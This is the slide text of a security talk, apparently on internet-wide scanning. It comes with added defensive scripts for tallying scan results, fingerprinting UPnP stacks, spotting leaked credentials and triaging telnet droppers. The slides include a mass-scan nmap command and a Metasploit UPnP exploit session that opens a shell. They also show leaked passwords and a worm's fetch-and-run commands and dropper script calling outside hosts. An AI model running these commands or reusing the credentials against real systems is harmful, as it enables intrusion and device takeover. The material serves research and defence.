Slide 1


Slide 2


Slide 3


Slide 4


Slide 5


Slide 6

# nmap -sS -PS443 -p443 -n --max-retries=1 -n -M 256 \
    --open \
    --min-rtt-timeout=1000ms --max-rtt-timeout=1000ms \
    --min-hostgroup=50000 --min-rate=50000 \
    --max-rate=50000 \
    --script=banner-plus.nse \
    --excludefile=exclude.txt \
    -oG node.gnmap -oX node.xml \
    -iR 250000

Code: https://github.com/hdm/scan-tools
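The command above writes grepable output (-oG) per scan node and honours a do-not-scan list (--excludefile). The parser below is an added example, not code from hdm/scan-tools: it tallies unique IPs per open port from that -oG output (the figure the "Unique IPs by Service" charts plot) and re-checks every host against the exclusion list, so a stale exclude.txt on a node shows up as a "leaked" address instead of silently entering the data set. The sample output and exclusion list are constructed; the -oG line layout assumed is "Host: <ip> (<name>)<TAB>Ports: <port>/<state>/<proto>/...".

```python
#!/usr/bin/env python3
r"""Tally unique IPs per open service from nmap grepable output (-oG).

Added example, not part of hdm/scan-tools. Assumes the standard -oG layout
("Host: <ip> (<name>)\tPorts: <port>/<state>/<proto>/...") and an exclusion
file with one address or CIDR per line, as given to --excludefile.
"""
import ipaddress
import re
from collections import defaultdict

# Constructed sample output (not data from the talk). The third host lies
# inside the excluded range and must not be counted.
SAMPLE_GNMAP = (
    "# Nmap 6.25 scan initiated as: nmap -sS -PS443 -p443,80 -n --open -oG node.gnmap -iR 250000\n"
    "Host: 203.0.113.7 ()\tPorts: 443/open/tcp//https///\tIgnored State: filtered (0)\n"
    "Host: 198.51.100.22 ()\tPorts: 443/open/tcp//https///, 80/open/tcp//http///\n"
    "Host: 192.0.2.9 ()\tPorts: 443/open/tcp//https///\n"
    "Host: 203.0.113.7 ()\tPorts: 80/open/tcp//http///\n"
    "# Nmap done -- 250000 IP addresses (3 hosts up) scanned\n"
)
# Constructed do-not-scan list in --excludefile format.
SAMPLE_EXCLUDE = "# constructed exclusion list\n192.0.2.0/24\n"

# Group 1: address; group 2: the Ports field up to the next tab or end of line.
HOST_RE = re.compile(r"^Host: (\S+) \([^)]*\)\tPorts: ([^\t]*)")


def load_exclusions(text):
    """Parse an --excludefile list: one IP or CIDR per line, '#' comments."""
    nets = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            nets.append(ipaddress.ip_network(line, strict=False))
    return nets


def is_excluded(ip, nets):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def parse_gnmap(text, exclusions=()):
    """Return ({(port, proto): set(ips)}, [excluded IPs that still appeared])."""
    by_service = defaultdict(set)
    leaked = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment, "Status:" line or trailer
        ip, port_field = m.group(1), m.group(2)
        if is_excluded(ip, exclusions):
            # The scanner should never have touched this host: the exclude
            # list on the node was stale or missing when the scan ran.
            leaked.append(ip)
            continue
        for entry in port_field.split(","):
            fields = entry.strip().split("/")  # port/state/proto/owner/service/...
            if len(fields) < 3 or fields[1] != "open":
                continue
            by_service[(int(fields[0]), fields[2])].add(ip)
    return by_service, leaked


def unique_ips_by_service(text, exclusions=()):
    """The number the 'Unique IPs by Service' chart plots, keyed by (port, proto)."""
    by_service, _ = parse_gnmap(text, exclusions)
    return {svc: len(ips) for svc, ips in by_service.items()}


if __name__ == "__main__":
    nets = load_exclusions(SAMPLE_EXCLUDE)
    by_service, leaked = parse_gnmap(SAMPLE_GNMAP, nets)
    for (port, proto), ips in sorted(by_service.items(), key=lambda kv: -len(kv[1])):
        print(f"{port}/{proto}\t{len(ips)}")
    if leaked:
        print("excluded hosts present in output:", ", ".join(leaked))
```

Run it over the concatenation of every node's .gnmap file; because the tally is a set per service, a host that answered on several runs (or on several nodes when -iR ranges overlap) is still counted once.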

Slide 7

Code: https://github.com/hdm/scan-tools

Slide 8


Slide 9


Slide 10

Excerpts from abuse complaints received during the scans:

"So what you're saying is I should just ignore the excessive amount of port snooping coming from your system(s), and I should allow this on your word alone? Since when did you become my big brother? Are you related to Obama?"

"Ironically, since the days you have begun your independent scans we have received a few DDOS attacks using udp_app port 53 traffic..... any correlation?"

"Please identify your customer operating from the above address at the time mentioned, and terminate immediately his hacking activities. Please prevent him from continuing his hacking activities in the future as well. Due to the potential severity of this incident, we have reported it to the Computer Emergency Response Team (CERT) in United States (US) and Denmark."

"You are welcome to try and hack my network as an academic exercise but even if you are successful you will find nothing of interest, and any attempt to corrupt the O/S can be restored in a few minutes."

Slide 11


Slide 12

[Chart: Unique IPs by Service; y-axis 0 to 140,000,000; ports 1900, 80, 161, 137, 443, 8080, 23, 21, 22, 25, 3306, 110, 143, 995, 993, 5353, 5900, 17185]

Slide 13

[Charts: Global IPv4 Services and Australian IPv4 Services, both over ports 1900, 80, 161, 137, 443, 8080, 23, 21, 22, 25, 3306, 110, 143, 995, 993, 5353, 5900, 17185]

Slide 14


Slide 15


Slide 16

[Chart of UPnP implementations: Intel/Portable SDK, MiniUPnP, Broadcom SDK, Others]

Slide 17


Slide 18

$ msfconsole
msf > use exploit/multi/upnp/libupnp_ssdp_overflow
msf exploit(libupnp_ssdp_overflow) > set RHOST 192.168.122.89
msf exploit(libupnp_ssdp_overflow) > exploit
[*] Started reverse double handler
[*] Exploiting 192.168.122.89 with target Supermicro Onboard IPMI (X9SCL/X9SCM)
[+] Sending payload of 178 bytes to 192.168.122.89:56911...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command shell session 1 opened
[*] Shutting down payload stager listener...
uname -a
Linux debian-armel 2.6.32-5-versatile #1 Wed Jan 12 23:05:11 UTC 2011 armv5tejl
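The stack breakdown on slide 16 and the libupnp exploit on slide 18 both start from the same datum: the SERVER header a device returns to an SSDP M-SEARCH. The script below is an added example, not code from the talk or from Metasploit. It builds the M-SEARCH, parses HTTPU replies, classifies the stack family from the SERVER header and flags Intel/Portable SDK (libupnp) builds older than 1.6.18, the release that fixed the SSDP parsing overflows the module above exploits. The header regexes are assumptions drawn from common firmware strings, the sample replies are constructed, and the offline summary runs without touching the network; discover() is the live multicast probe for a LAN.

```python
#!/usr/bin/env python3
"""Classify UPnP stacks from SSDP replies and flag libupnp builds older than 1.6.18.

Added example, not code from the talk or from Metasploit. SERVER-header
patterns are assumptions based on common firmware strings.
"""
import re
import socket
from collections import Counter

SSDP_GROUP = ("239.255.255.250", 1900)
MSEARCH = (
    "M-SEARCH * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    'MAN: "ssdp:discover"\r\n'
    "MX: 2\r\n"
    "ST: ssdp:all\r\n"
    "\r\n"
).encode()
LIBUPNP_FIXED = (1, 6, 18)  # first libupnp release with the SSDP overflow fixes

# Family name and a SERVER-header regex whose group 1 (if any) is the version.
STACK_PATTERNS = [
    ("Intel/Portable SDK", re.compile(r"(?:Intel|Portable) SDK for UPnP devices/([\d.]+)", re.I)),
    ("MiniUPnP", re.compile(r"MiniUPnPd?/([\d.]+)", re.I)),
    ("Broadcom SDK", re.compile(r"(?:BRCM\d*|Broadcom)(?:/([\d.]+))?", re.I)),
]

# Constructed replies; not captures from the Critical.IO data set.
SAMPLE_REPLIES = [
    b"HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=1800\r\nEXT:\r\n"
    b"LOCATION: http://192.0.2.10:49152/rootDesc.xml\r\n"
    b"SERVER: Linux/2.6.30, UPnP/1.0, Portable SDK for UPnP devices/1.6.6\r\n"
    b"ST: upnp:rootdevice\r\nUSN: uuid:0001::upnp:rootdevice\r\n\r\n",
    b"HTTP/1.1 200 OK\r\nLOCATION: http://192.0.2.11:49152/gatedesc.xml\r\n"
    b"SERVER: Linux/2.4 UPnP/1.0 Intel SDK for UPnP devices/1.2\r\n"
    b"ST: upnp:rootdevice\r\nUSN: uuid:0002::upnp:rootdevice\r\n\r\n",
    b"HTTP/1.1 200 OK\r\nLOCATION: http://192.0.2.12:5000/rootDesc.xml\r\n"
    b"SERVER: OpenWRT/Attitude_Adjustment UPnP/1.1 MiniUPnPd/1.8\r\n"
    b"ST: upnp:rootdevice\r\nUSN: uuid:0003::upnp:rootdevice\r\n\r\n",
    b"HTTP/1.1 200 OK\r\nLOCATION: http://192.0.2.13:2869/upnphost/udhisapi.dll\r\n"
    b"SERVER: Microsoft-Windows-NT/5.1 UPnP/1.0 UPnP-Device-Host/1.0\r\n"
    b"ST: upnp:rootdevice\r\nUSN: uuid:0004::upnp:rootdevice\r\n\r\n",
    b"NOTIFY * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n\r\n",  # not a search reply
]


def parse_ssdp_reply(data):
    """Split an HTTPU reply into {lowercased header: value}; None if not a 200 reply."""
    head = data.decode("latin-1", "replace").partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    if not lines or not lines[0].startswith("HTTP/1.1 200"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def parse_version(text):
    """'1.6.6' -> (1, 6, 6); None when there is no numeric version."""
    return tuple(int(n) for n in re.findall(r"\d+", text or "")) or None


def classify_stack(server):
    """Map a SERVER header to (family, version tuple or None)."""
    for family, pattern in STACK_PATTERNS:
        m = pattern.search(server or "")
        if m:
            return family, parse_version(m.group(1))
    return "Other", None


def libupnp_vulnerable(family, version):
    """True for Intel/Portable SDK builds older than 1.6.18 (or with no version)."""
    if family != "Intel/Portable SDK":
        return False
    return version is None or version < LIBUPNP_FIXED


def summarize(replies):
    """Count stack families over raw reply bytes; also list pre-1.6.18 libupnp hosts."""
    families, vulnerable = Counter(), []
    for data in replies:
        headers = parse_ssdp_reply(data)
        if headers is None:
            continue
        family, version = classify_stack(headers.get("server"))
        families[family] += 1
        if libupnp_vulnerable(family, version):
            vulnerable.append((headers.get("location"), headers.get("server")))
    return families, vulnerable


def discover(timeout=2.0):
    """Send one multicast M-SEARCH and collect every reply until the timeout."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    replies = []
    try:
        sock.sendto(MSEARCH, SSDP_GROUP)
        while True:
            replies.append(sock.recvfrom(65535)[0])
    except socket.timeout:
        pass
    finally:
        sock.close()
    return replies


if __name__ == "__main__":
    families, vulnerable = summarize(SAMPLE_REPLIES)
    print(dict(families))
    for location, server in vulnerable:
        print("pre-1.6.18 libupnp:", location, "|", server)
```

A SERVER header is self-reported and easy to spoof or strip, so treat the classification as triage: a version at or above 1.6.18 is not proof of a fix when a vendor back-ported patches without bumping the string, and a missing version is reported as vulnerable rather than ignored.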

Slide 19


Slide 20

Web server share, January 2013:
Netcraft: Apache, Microsoft, NginX
Critical.IO: RomPager, Apache, Akamai, NginX, Microsoft

Slide 21


Slide 22

[Chart: Devices by Country: USA, ESP, IND, TUR, BRA, ITA, DEU, POL, RUS, THA, VNM, CHN, PER, MYS, ARG, EGY, GBR, TWN, KOR, IDN]

Slide 23


Slide 24


Slide 25

Username    Password
admin       12345
root        h3capadmin
lyzdm       xialiang!@#
lywlj       nhkhwlwhz
lymr        admin
lyjy        1234
lyzwm       szwx@ah
lyys        huawei
jlllylj     itms123456
lygsg       AAA888###
lyjrw       662
lyyys       abc123!
lysw        zch3capadmin
lygmb       123456
lyfyh       apadmin
huawei      password

Slide 26

username=sa password=Masterkey2011 LicenseCheck=Defne
DSN=sms;UID=XXX;PWD=XXXsys;
DSN=GeoXXX;UID=XXX;PWD=XXXsys;
8383 password h4ve@gr8d3y
--daemon --port 8020 --socks5 --s_user Windows --s_password System
XXXX /ssh /auth=password /user=admin /passwd=admin_p@s$word
http://a.b.c/manage/retail_login.php3?ms_id=14320101&passwd=7325
a.b.c.d:3389 --user administrator --pass passw0rd123
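The strings above are credentials that leaked through banners, process listings and URLs in the scan data. The script below is an added example, not code from the talk: it runs a small set of rules over banner text covering the shapes on this slide (key=value pairs, ODBC DSN strings, --user/--pass style flags, URL query strings, and a bare "password <value>" form reported at low confidence), pairs each password with a user name on the same line when one is present, and masks the secret in the finding so the report itself is not another leak. The rules and the sample banner lines are assumptions and constructed input, not a complete secret-detection ruleset.

```python
#!/usr/bin/env python3
"""Flag credentials leaking through service banners and process listings.

Added example, not code from the talk. The rules are assumptions covering the
forms seen on the slide above; they are not an exhaustive secret scanner.
"""
import re

PASSWORD_KEYS = r"(?:password|passwd|pwd|pass|s_password|secret)"
USER_KEYS = r"(?:username|user|uid|login|s_user)"

# key=value / key: value, stopping at whitespace, ';' (DSN strings), '&' (query strings).
# The (?<!\w) guard keeps 'login' in 'retail_login.php3' from matching.
PASSWORD_KV = re.compile(rf"(?<!\w){PASSWORD_KEYS}\s*[=:]\s*([^\s;&\"']+)", re.I)
USER_KV = re.compile(rf"(?<!\w){USER_KEYS}\s*[=:]\s*([^\s;&\"']+)", re.I)
# Command-line style: --pass value, --s_password value, and the short -p/-u
# forms used by tools such as ftpget (the short forms are the noisiest rule).
PASSWORD_FLAG = re.compile(rf"(?:--?{PASSWORD_KEYS}|-p)\s+(\S+)", re.I)
USER_FLAG = re.compile(rf"(?:--?{USER_KEYS}|-u)\s+(\S+)", re.I)
# Bare "password <value>" with no separator: reported, but at low confidence.
PASSWORD_BARE = re.compile(r"\bpassword\s+(\S+)", re.I)

# Constructed sample lines modelled on the slide, not the original data.
SAMPLE_BANNERS = """\
220 ProFTPD 1.3.3g Server (ProFTPD Default Installation) [203.0.113.5]
username=sa password=Masterkey2011 LicenseCheck=Defne
DSN=sms;UID=report;PWD=reportsys;
8383 password h4ve@gr8d3y
--daemon --port 8020 --socks5 --s_user Windows --s_password System
/ssh /auth=password /user=admin /passwd=admin_p@s$word
GET /manage/retail_login.php3?ms_id=14320101&passwd=7325 HTTP/1.0
198.51.100.9:3389 --user administrator --pass passw0rd123
SSH-2.0-OpenSSH_5.3
"""


def mask(secret, keep=2):
    """Keep a short prefix so analysts can correlate findings without storing the secret."""
    return secret[:keep] + "*" * max(len(secret) - keep, 0)


def find_credentials(text):
    """Return one finding per line that carries a password-like value."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        pw = PASSWORD_KV.search(line) or PASSWORD_FLAG.search(line)
        confidence = "high"
        if not pw:
            pw = PASSWORD_BARE.search(line)
            confidence = "low"
        if not pw:
            continue
        user = USER_KV.search(line) or USER_FLAG.search(line)
        findings.append({
            "line": lineno,
            "user": user.group(1) if user else None,
            "password": mask(pw.group(1)),
            "confidence": confidence,
        })
    return findings


if __name__ == "__main__":
    for f in find_credentials(SAMPLE_BANNERS):
        print(f"line {f['line']:>3}  {f['confidence']:<4}  user={f['user']!s:<14} pass={f['password']}")
```

The rules are deliberately line-local: a banner is one record, and a user name on a different line is not evidence that it belongs with the password. Anything the bare-word rule reports needs a human look before it is filed as a leak.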

Slide 27


Slide 28


Slide 29

[Chart of vendors: HUAWEI, QUALCOMM, ASUSTEK, VMWARE, HP, DELL, HYUNDAI, MICROSOFT, INTEL]

Slide 30


Slide 31

[Chart: FTP Software: ProFTPD, PureFTP, Microsoft, Firmware, vsFTPd, Mikrotik, FileZilla, Speedtouch, Other (slice labels 27%, 15%, 10%, 7%, 5%, 29%)]
[Chart: ProFTPD Versions: 1.3.3g, 1.3.1, 1.3.3a, 1.3.4a, 1.3.3e, 1.3.2e, 1.3.3c, 1.3.4b, 1.3.0, 1.3.3d, 1.3.2c, 1.2.10, 1.3.0a, 1.2.9, 1.3.5rc1, 1.3.2]

Slide 32


Slide 33

[Chart: SMTP, POP3, IMAP, POP3S, IMAPS]

Slide 34


Slide 35

[Chart: VNC Protocol Versions: RFB 003.008, RFB 003.889, RFB 003.006, RFB 003.003, RFB 004.001, RFB 004.000, RFB 003.007, RFB 003.004]

Slide 36


Slide 37


Slide 38


Slide 39

[Chart, y-axis 0 to 6000: OpenServer, AIX, Solaris, UnixWare, IRIX, OpenVMS, HPUX]

Slide 40


Slide 41


Slide 42


Slide 43


Slide 44


Slide 45


Slide 46


Slide 47


Slide 48

$ telnet A.B.C.D
Escape character is '^]'.
sh-3.00# history
    1  root
    2  admin
    3  mkdir /var/run; mkdir /var/run/.sysV6 && cd /var/run/.sysV6 && wget -c http://176.xxx.xxx.xxx/sysV6/sysV6.sh && sh sysV6.sh || mkdir /var/run/.sysV6 && cd /var/run/.sysV6 && ftpget -u skynet -p cloud 176.xxx.xxx.xxx sysV6.sh sysV6/sysV6.sh && sh sysV6.sh &

Slide 49

# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.
# YOUR HTTPD SERVER:
REFERENCE_HTTP="http://173.xxx.xxx.xxx"
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPSEL} -P /var/run …
wget -c ${REFERENCE_HTTP}/${REFERENCE_MIPS} -P /var/run && …
wget -c ${REFERENCE_HTTP}/${REFERENCE_ARM} -P /var/run && …
wget -c ${REFERENCE_HTTP}/${REFERENCE_PPC} -P /var/run && …
wget -c ${REFERENCE_HTTP}/${REFERENCE_SUPERH} -P /var/run && …
wget -c ${REFERENCE_HTTP}/sshd -P /var/run && …
wget -c ${REFERENCE_HTTP}/telnetd -P /var/run && …
iptables -A INPUT -p tcp --dport 23 -j DROP
mv /usr/bin/wget /usr/bin/wg
mv /bin/wget /bin /wg
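The shell history on slide 48 and the dropper script on slide 49 show the sequence such a telnet worm leaves behind: a hidden working directory under /var/run, fetch-and-execute through wget or ftpget (with the FTP credentials inline), one binary per CPU architecture, an iptables rule that locks competing scanners out of port 23, and wget renamed so the next worm cannot use it. The triage script below is an added example, not code from the talk: it scores captured shell history or telnet session lines against those indicators, weights them so that no single generic action (a plain wget, a plain iptables rule) reaches the alert threshold on its own, and combines the tags over the whole session because droppers spread the steps across several commands. Indicator names, weights, the threshold and the sample sessions are constructed assumptions.

```python
#!/usr/bin/env python3
"""Triage shell history or telnet session logs for the telnet-dropper pattern.

Added example, not code from the talk. Indicator names, weights, the alert
threshold and the sample sessions are constructed assumptions.
"""
import re

# (tag, weight, pattern). Weights are chosen so that a single generic action
# (plain wget, plain iptables) stays below ALERT_THRESHOLD on its own.
INDICATORS = [
    ("hidden_dir_var_run", 3, re.compile(r"mkdir\s+(?:-p\s+)?/var/run/\.\w+")),
    ("fetch_then_exec", 3, re.compile(r"\b(?:wget|ftpget|tftp|curl)\b.*(?:&&|;|\|\|).*\bsh\s+\S+\.sh")),
    ("ftpget_inline_creds", 2, re.compile(r"\bftpget\s+.*-u\s+\S+\s+-p\s+\S+")),
    ("multiarch_fetch", 2, re.compile(r"REFERENCE_(?:MIPSEL|MIPS|ARM|PPC|SUPERH)|/(?:mipsel|mips|arm|ppc|sh4)\b", re.I)),
    ("telnet_lockout", 2, re.compile(r"iptables\s+-A\s+INPUT\b.*--dport\s+23\b.*-j\s+DROP")),
    ("hide_wget", 2, re.compile(r"\bmv\s+\S*/wget\s+\S+")),
    ("background_exec", 1, re.compile(r"\bsh\s+\S+\.sh\s*&\s*$")),
]
ALERT_THRESHOLD = 4

# Constructed sessions (documentation-range addresses, not the slide's hosts).
BENIGN_SESSION = [
    "root",
    "ls -la /var/run",
    "wget -c http://192.0.2.20/firmware/update.bin -P /tmp",
    "iptables -A INPUT -p tcp --dport 22 -j ACCEPT",
]
DROPPER_SESSION = [
    "root",
    "admin",
    "mkdir /var/run; mkdir /var/run/.sysV6 && cd /var/run/.sysV6 && "
    "wget -c http://192.0.2.30/sysV6/sysV6.sh && sh sysV6.sh || "
    "mkdir /var/run/.sysV6 && cd /var/run/.sysV6 && "
    "ftpget -u skynet -p cloud 192.0.2.30 sysV6.sh sysV6/sysV6.sh && sh sysV6.sh &",
    "wget -c http://192.0.2.30/bins/mipsel -P /var/run && chmod +x /var/run/mipsel",
    "iptables -A INPUT -p tcp --dport 23 -j DROP",
    "mv /usr/bin/wget /usr/bin/wg",
]


def score_line(line):
    """Return (score, [tags]) for one command line, tags in INDICATORS order."""
    tags = [tag for tag, _, pat in INDICATORS if pat.search(line)]
    score = sum(w for tag, w, _ in INDICATORS if tag in tags)
    return score, tags


def triage(lines):
    """Score every line and combine distinct tags across the session.

    The session score counts each tag once, so a dropper that spreads its
    steps over several commands still crosses the threshold, while one
    repeated benign command does not accumulate.
    """
    per_line, session_tags = [], set()
    for n, line in enumerate(lines, 1):
        score, tags = score_line(line)
        if tags:
            per_line.append((n, score, tags))
            session_tags.update(tags)
    session_score = sum(w for tag, w, _ in INDICATORS if tag in session_tags)
    return {
        "lines": per_line,
        "session_tags": sorted(session_tags),
        "session_score": session_score,
        "alert": session_score >= ALERT_THRESHOLD,
    }


if __name__ == "__main__":
    for name, session in (("benign", BENIGN_SESSION), ("dropper", DROPPER_SESSION)):
        result = triage(session)
        print(f"{name}: alert={result['alert']} score={result['session_score']} tags={result['session_tags']}")
        for n, score, tags in result["lines"]:
            print(f"  line {n}: {score} {tags}")
```

Feed it the lines of a honeypot telnet transcript or the history file pulled from a compromised device; the per-line output tells you which command did what, and the session verdict is what to alert on.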

Slide 50


Slide 51


Slide 52
